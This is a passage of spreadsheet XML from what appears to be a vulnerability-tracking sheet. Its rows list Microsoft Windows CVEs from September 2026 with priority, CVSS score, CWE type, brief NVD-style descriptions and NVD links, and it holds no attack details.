          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K47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71" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q471" s="5" t="inlineStr"/>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S471" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68844</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q472" s="5" t="inlineStr"/>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S472" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68844</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68845</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K47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73" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q473" s="5" t="inlineStr"/>
      <c r="R473" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S473" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68845</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68848</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K47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74" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q474" s="5" t="inlineStr"/>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S474" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68848</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68850</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q475" s="5" t="inlineStr"/>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S475" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Account allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68850</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68875</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K47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76" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q476" s="5" t="inlineStr"/>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S476" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68877</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q477" s="5" t="inlineStr"/>
      <c r="R477" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S477" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68877</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68885</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr"/>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q478" s="5" t="inlineStr"/>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S478" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68885</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68888</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q479" s="5" t="inlineStr"/>
      <c r="R479" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S479" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68888</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68890</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q480" s="5" t="inlineStr"/>
      <c r="R480" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S480" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68890</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68892</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q481" s="5" t="inlineStr"/>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S481" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68892</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68896</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q482" s="5" t="inlineStr"/>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="S482" s="5" t="inlineStr">
        <is>
          <t>Absolute path traversal in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68896</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69265</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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3" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q483" s="5" t="inlineStr"/>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S483" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69269</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S484" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69269</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69270</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K48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5" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S485" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69277</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S486" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69277</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69283</t>
        </is>
      </c>
      <c r="D487" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F487" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q487" s="5" t="inlineStr"/>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S487" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69283</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69284</t>
        </is>
      </c>
      <c r="D488" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F488" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q488" s="5" t="inlineStr"/>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S488" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DCOM Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69284</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69289</t>
        </is>
      </c>
